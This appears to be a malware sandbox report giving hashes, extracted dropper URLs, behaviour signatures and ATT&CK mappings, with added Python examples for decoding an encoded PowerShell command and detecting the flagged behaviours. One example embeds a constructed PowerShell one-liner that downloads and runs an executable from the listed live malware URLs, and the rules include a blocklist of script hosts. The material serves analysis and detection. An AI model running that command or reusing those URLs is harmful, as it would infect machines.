General

  • Target

    65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118

  • Size

    164KB

  • Sample

    240522-eaay2aah88

  • MD5

    65e3d81e912145deaf34eefd2537fdc7

  • SHA1

    dcedd68b5a21efb1a999fe4ffc35385909528803

  • SHA256

    617f019d01c1d776d1c27243f6786c2c0cfa84182b5f0db4599ad12646ce3dfc

  • SHA512

    9d18a7716b3cccd5b4e091e553405e6797a76e2530415d333e1c4d1cae7b4a3fe18ac9c89656d4ecadab0f154408faf53090b2fe9cfe93a3c828738c16ca8a95

  • SSDEEP

    1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a94ay9y0J6f264NBM:mrfrzOH98ipg4PJ6fQBM

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper (URLs from which the PowerShell stage downloads the executable payload)

    http://www.yusukelife.com/wp/ure/
    https://www.ingyouth.com/wp-includes/0zCW/
    http://alphapharma247.com/wp-content/plugins/r/
    http://muanha24h.com/wp-content/fHS7/
    http://buyhacks.net/wp-content/jgLqdhk/
    https://comsotaque.com/wp-includes/5i/
    https://qualitychildcarepreschool.com/emqblk/Ik2D/
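The config above is a PowerShell stage that carries a list of payload URLs. The script below is an added example, not code from the report or from the sample: it takes a process command line of the form a malicious macro typically launches (powershell.exe with an -EncodedCommand blob), decodes the UTF-16LE/base64 body and pulls out the ordered, de-duplicated URL list in the report's exe.dropper form. The embedded PowerShell one-liner is constructed for the example (the URL list is the one the report extracted; the surrounding split/download/run code is invented and is not the command line recorded for this sample), and the regexes for the -e/-ec/-enc/-EncodedCommand switch and for URL boundaries are this example's own assumptions.

```python
import base64
import re
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed input: a PowerShell one-liner of the shape a malicious Office
# macro typically launches (URL list split on '@', download-and-run loop).
# The URLs are the seven the report extracted; the surrounding script is
# invented for this example and is NOT the command line recorded for the sample.
_CONSTRUCTED_SCRIPT = (
    "$u='http://www.yusukelife.com/wp/ure/@"
    "https://www.ingyouth.com/wp-includes/0zCW/@"
    "http://alphapharma247.com/wp-content/plugins/r/@"
    "http://muanha24h.com/wp-content/fHS7/@"
    "http://buyhacks.net/wp-content/jgLqdhk/@"
    "https://comsotaque.com/wp-includes/5i/@"
    "https://qualitychildcarepreschool.com/emqblk/Ik2D/'.Split('@');"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "Start-Process $p;break}catch{}}"
)


def encode_powershell(script: str) -> str:
    """Encode a script as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# The constructed process command line, as it would appear in process-creation telemetry.
CONSTRUCTED_CMDLINE = "powershell.exe -nop -w hidden -e " + encode_powershell(_CONSTRUCTED_SCRIPT)

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts these prefixes).
_ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# A URL ends at whitespace, quotes, brackets, or the separators droppers use to pack lists ('@', ';', ',').
_URL = re.compile(r"https?://[^\s'\"@;,()]+", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an -EncodedCommand, else None."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")


def extract_dropper_urls(cmdline: str) -> List[str]:
    """Recover the ordered, de-duplicated payload URL list from a dropper command line."""
    script = decode_encoded_command(cmdline) or cmdline  # fall back to a plain-text command line
    seen, urls = set(), []
    for u in _URL.findall(script):
        if u not in seen:
            seen.add(u)
            urls.append(u)
    return urls


def hostnames(urls: List[str]) -> List[str]:
    """Hostnames to pivot on in DNS, proxy or blocklist data."""
    return [urlsplit(u).hostname or "" for u in urls]


def config_lines(urls: List[str]) -> List[str]:
    """Render the list in the report's 'exe.dropper' form."""
    return [f"exe.dropper {u}" for u in urls]


if __name__ == "__main__":
    for line in config_lines(extract_dropper_urls(CONSTRUCTED_CMDLINE)):
        print(line)
```

Real droppers also build URLs by string concatenation, format operators or reversed strings, which a regex over the decoded text will miss; in that case run the decoded script through a PowerShell AST walk or a sandbox and apply the same URL extraction to the resulting string values.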

Targets

    • Target

      65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory
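The three signatures above describe behaviour that is straightforward to express as detection rules over endpoint telemetry. The following is an added example, not the sandbox's own signature logic: it runs three rules over constructed process-creation, network and file-creation events and reports which rule fired on which event. The rule names are the report's; the process lists (Office parents, script hosts, processes that should not make outbound requests), the privileged-user exclusion for the System32 rule, and all image paths, user names and the dropped file name are this example's assumptions, with the remote host taken from the report's dropper URL list.

```python
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Event:
    kind: str              # "process", "network" or "file"
    image: str             # full path of the acting process
    parent: str = ""       # parent image (process-creation events)
    cmdline: str = ""
    remote_host: str = ""  # network events
    path: str = ""         # file-creation events
    user: str = ""


# Constructed telemetry (invented paths/users): the three behaviours the report
# flags, followed by benign events that must NOT fire.
CONSTRUCTED_EVENTS = [
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          cmdline="powershell.exe -nop -w hidden -e <base64>", user=r"LAB\analyst"),
    Event("network", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          remote_host="www.yusukelife.com", user=r"LAB\analyst"),
    Event("file", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          path=r"C:\Windows\System32\dropped.exe", user=r"LAB\analyst"),
    Event("process", r"C:\Windows\System32\svchost.exe",
          parent=r"C:\Windows\System32\services.exe", user="NT AUTHORITY\\SYSTEM"),
    Event("network", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          remote_host="update.googleapis.com", user=r"LAB\analyst"),
    Event("file", r"C:\Windows\servicing\TrustedInstaller.exe",
          path=r"C:\Windows\System32\drivers\example.sys", user="NT SERVICE\\TrustedInstaller"),
]

# Assumed lists; tune to the environment.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
NET_BLOCKLIST = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                 "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
SYSTEM32_PREFIX = "c:\\windows\\system32\\"
# Servicing components legitimately write to System32; excluding them is an assumed noise filter.
PRIVILEGED_USERS = {"nt authority\\system", "nt service\\trustedinstaller"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_child_process(e: Event) -> bool:
    """Office application spawning a script host: the classic macro-to-PowerShell hop."""
    return (e.kind == "process"
            and image_name(e.parent) in OFFICE_APPS
            and image_name(e.image) in SCRIPT_HOSTS)


def blocklisted_process_network(e: Event) -> bool:
    """A script host or LOLBin initiating an outbound connection."""
    return e.kind == "network" and image_name(e.image) in NET_BLOCKLIST


def drops_file_in_system32(e: Event) -> bool:
    """File created under System32 by something other than a servicing account."""
    return (e.kind == "file"
            and e.path.lower().startswith(SYSTEM32_PREFIX)
            and e.user.lower() not in PRIVILEGED_USERS)


RULES: Dict[str, Callable[[Event], bool]] = {
    "Process spawned unexpected child process": unexpected_child_process,
    "Blocklisted process makes network request": blocklisted_process_network,
    "Drops file in System32 directory": drops_file_in_system32,
}


def evaluate(events: List[Event]) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the events that triggered it."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits[name].append(i)
    return hits


def fired(events: List[Event]) -> List[str]:
    """Names of the rules that fired at least once."""
    return [name for name, idx in evaluate(events).items() if idx]


if __name__ == "__main__":
    for name, idx in evaluate(CONSTRUCTED_EVENTS).items():
        print(f"{name}: events {idx}")
```

The first two rules are strong on their own; the System32 rule is the noisiest in production, since installers and Windows servicing write there constantly, so it is best correlated with the other two (same process tree, short time window) rather than alerted on in isolation.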

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic            Technique                      Count  ID
  Defense Evasion   Modify Registry                1      T1112
  Discovery         Query Registry                 2      T1012
  Discovery         System Information Discovery   2      T1082

Tasks